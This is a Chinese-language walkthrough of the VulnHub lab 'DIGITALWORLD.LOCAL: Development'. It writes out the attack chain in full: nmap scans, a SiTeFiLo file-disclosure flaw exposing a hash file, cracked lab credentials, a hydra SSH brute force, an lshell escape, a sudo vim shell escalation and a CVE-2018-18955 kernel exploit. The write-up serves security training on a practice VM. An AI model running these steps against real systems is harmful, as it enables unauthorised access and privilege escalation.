vulnhub綜合靶場：DIGITALWORLD.LOCAL發展

一、知識點和漏洞

1. 知識點

1） Namp收集信息

2） 簡單文本文件登錄腳本 (SiTeFiLo) 1.0.6 - 文件泄露/遠程文件包含

3） 空間越權(CVE-2018-18955)

4） hydra爆破

5） Vim提權

2.漏洞

1） CVE-2008-5763/2008-5762

2） CVE-2018-18955

二、基本環境和工具

環境：

1）目標靶機：ubuntu（官網下載靶機環境）

2）百香果沙盤(Docker版)20210413

工具：

1）Kali：kali_201802版本

2）nmap：kali內置

3）Hydra:v8.6

4）空間越權腳本：exploit.ldpreload.sh

5）漏洞檢測腳本：les.sh

1.靶機環境：

1）靶場下載。

DIGITALWORLD.LOCAL：發展靶場下載地址：

https://www.vulnhub.com/entry/digitalworldlocal-development,280/

2）靶場安裝。下載完后文件為devt-improved.7z。

解壓文件到相應目錄。

雙擊第二個文件后進行導入虛擬機。

3）虛擬機設置。根據個人的電腦配置適當設置內存和處理器以及網絡。

4）環境配置。

開啟虛擬機,選擇linux恢復模式。

?????????????????????????????????????系統啟動完畢,??????????我們選擇root一行回車,然后再次回車進入命令行模式。

查看是否自動獲取到ip。

dhcp下發獲取ip。

通過訪問Fw2管理地址：http://1.1.1.12，賬號密碼：root/goktech也可以查看：

通過上圖我們知道了靶機的IP地址為10.10.19.50，接著我們就可以來配置端口映射，點擊網絡-防火墻-端口轉發-新增：

配置kali的ip：

ifconfig eth0 66.28.6.10 netmask 255.255.255.0

route add default gw 66.28.6.1

5）安裝完成,使用kali進行網址掃描，nmap -sP 66.28.5.0/24,再次確定映射后的靶機IP為66.28.5.2這邊需要根據個人的虛擬機網絡適配器的網址掃描。

至此，完成靶機的安裝。成功訪問靶機頁面。http://66.28.5.2:8080/

2. 操作機環境： 

1）操作系統環境：kali linux 2018.2

2）工具環境：能夠運行sh文件

● EXP/利用工具

1.工具名稱：nmap

工具安裝：kali內置

使用說明：運行對應命令

nmap -sS -sV -sC -O -T5 -Pn -p- ip

注：服務版本識別（-sV）；

操作系統識別（-O）；

腳本掃描（-sC）；

Traceroute（–traceroute）

-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式來對目標主機掃描。

2.工具名稱：hydra

工具安裝：kali內置

使用說明：運行對應命令

hydra -L user.txt -P pass.txt ssh://ip

注：

-L file 大寫，指定用戶的用戶名字典

-p pass 小寫，用于指定密碼破解，很少使用，一般采用密碼字典。

3.工具名稱：空間越權腳本

工具安裝：git clone https://github.com/bcoles/kernel-exploits.git

使用說明：運行對應命令

cd kernel-exploits/CVE-2018-18955

./exploit.ldpreload.sh

下載地址：（官網/git/百度云/其他）

https://github.com/bcoles/kernel-exploits.git

4.工具名稱：漏洞檢測腳本

工具安裝：

wget：

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

使用說明：運行對應命令

chmod +x les.sh

./les.sh

三、靶場演練過程

1.整體思路

1）信息收集

2）漏洞發現

3）利用漏洞（Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion）

4）Vim提權

5）利用CVE-2018-18955提權

2.漏洞利用步驟：

步驟1：信息收集（IP和開放端口信息）

1.打開虛擬機，顯示登錄界面，未提示密碼相關信息。

2.查詢存活主機：nmap -sP 66.28.5.0/24，確定攻擊ip為66.28.5.2

3.nmap掃描端口22 113 139 445 8080 （nmap -sV 66.28.5.2 -p 22,8080,113,139,445）

得到靶機的22,8080,113,139,445都是開放狀態。

步驟2：漏洞發現

1.訪問66.28.5.2:8080

根據：There are many projects in this box. View some of these projects at html_pages.

告訴我們去訪問 html_pages目錄。

2.接著訪問http://66.28.5.2:8080/html_pages

發現敏感類信息development.html（猜測是否與靶機development有關）

訪問http://66.28.5.2:8080/development.html。

訪問http://66.28.5.2:8080/development.html并未發現什么信息，嘗試查看網頁源碼看看能獲取到什么

查看網頁源碼中得到一條提示：

<!-- You tried harder! Visit ./developmentsecretpage. -->

那我們就繼續訪問上一級的developmentsecretpage目錄。

3.根據上述提示進入http://66.28.5.2:8080/developmentsecretpage/

嘗試點擊可訪問的頁面。

出現Click here to log out.繼續訪問。

點擊后出現一個登陸界面。

嘗試弱密碼或萬能密碼登錄。

登陸之后出現以下報錯信息：

Deprecated: Function ereg_replace() is deprecated in /var/www/html/developmentsecretpage/slogin_lib.inc.php on line 335

Deprecated: Function ereg_replace() is deprecated in /var/www/html/developmentsecretpage/slogin_lib.inc.php on line 336

使用谷歌搜索一下slogin_lib.inc.php：

點擊第一個鏈接進入漏洞數據庫即存在漏洞：

Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion

步驟3：利用漏洞

1.進入漏洞數據庫：https://www.exploit-db.com/exploits/7444

查看攻擊方式并選擇一個簡單地攻擊方式：[!] EXPLOIT: /[path]/slog_users.txt

2.訪問

http://66.28.5.2:8080/developmentsecretpage/slog_users.txt

得到用戶名和MD5加密后密碼。

復制出來進行解密。

解密前：

admin, 3cb1d13bb83ffff2defe8d1443d3a0eb

intern, 4a8a2b374f463b7aedbb44a066363b81

patrick, 87e6d56ce79af90dbe07d387d3d0579e

qiu, ee64497098d0926d198f54f6d5431f98

md5解密后得到：

admin：未成功解密

patrick:P@ssw0rd25

qiu:qiu

intern:12345678900987654321

將用戶名和密碼分別保存為user.txt pass.txt

3.使用hydra進行ssh連接測試

hydra -L user.txt -P pass.txt ssh://66.28.5.2

得到login: intern  password: 12345678900987654321

可以ssh到靶機。

步驟4：VIM提權

1.登錄

使用login: intern password: 12345678900987654321登錄靶機：66.28.5.2

2.輸入id報錯，直接斷開連接（出現lshell 即limited shell）。

3.嘗試使用返回交互式shell脫離lshell

echo os.system('/bin/bash')

恢復正常后進行查看版本信息：

sudo-l 列出目前用戶可執行與無法執行的指令 發現用戶intern不能免密查看。

查看/etc/passwd查看是否還有其他用戶。

4.發現可切換用戶patrick

切換用戶patrick

login:patrick  password:P@ssw0rd25

并查看用戶patrick的可執行與無法執行的指令。

5.Vim提權

1）直接提權：sudo vim -c ':!/bin/sh'

步驟5：利用CVE-2018-18955提權

1.根據版本ubuntu18.04使用漏洞檢測腳本les.sh檢測是否有漏洞

les.sh 通過kali上傳（scp root@66.28.6.10:/root/les.sh ./）

執行命令

 chmod +x les.sh

 ./les.sh

發現存在漏洞CVE-2018-18955。

\

2.嘗試使用CVE-2018-18955提權

下載好所需的文件（切回intern用戶的/tmp 目錄底下）

有網絡直接git clone https://github.com/bcoles/kernel-exploits.git

無網絡是通過kali傳輸。

scp -r root@66.28.6.10:/root/kernel-exploits/* /tmp

3.切換到相應路徑利用腳本進行提權：

cd kernel-exploits/CVE-2018-18955

./exploit.ldpreload.sh

4.測試：提權成功。

四、過程問題記錄

剛開始使用nmap掃描時未發現靶機ip，后面進入linux恢復模式進行dhcp釋放，重新獲取到ip。我做的時候當輸入密碼錯誤大于3次時，ip會沒辦法ping通需要重啟后才可繼續！

五、收獲和總結

第一次做這個綜合靶場還是有一定的難度的，需要一定的耐心去磨合。也要自身的基礎去不斷測試，可能不留意的一個頁面就是我們想要的信息。多去鍛煉一下自己對敏感信息的判斷才能更快的獲取到提示。一些命令還是需要多敲多背！

六、參考資料

簡單文本文件登錄腳本 (SiTeFiLo) 1.0.6 - 文件泄露/遠程文件包含：

1.https://www.exploit-db.com/exploits/7444

2.CVE-2018-18955漏洞學習：

https://www.cnblogs.com/likaiming/p/10816529.html

https://blog.csdn.net/bme314/article/details/105631793

3.百香果沙盤使用參考：

“百香果”內網安全沙盤2.0bate版使用指南-基礎篇：

https://mp.weixin.qq.com/s/o6k3yNXlnQ3FwCciBUmrLw

“百香果”內網安全沙盤2.0bate版使用指南-進階篇：

https://mp.weixin.qq.com/s/nfa2DHkDPE43cIvvRmk1TA

“百香果”內網安全沙盤2.0bate版使用指南-高級篇：

https://mp.weixin.qq.com/s/MfWuBm_H7JxAvBKfnTpLZQ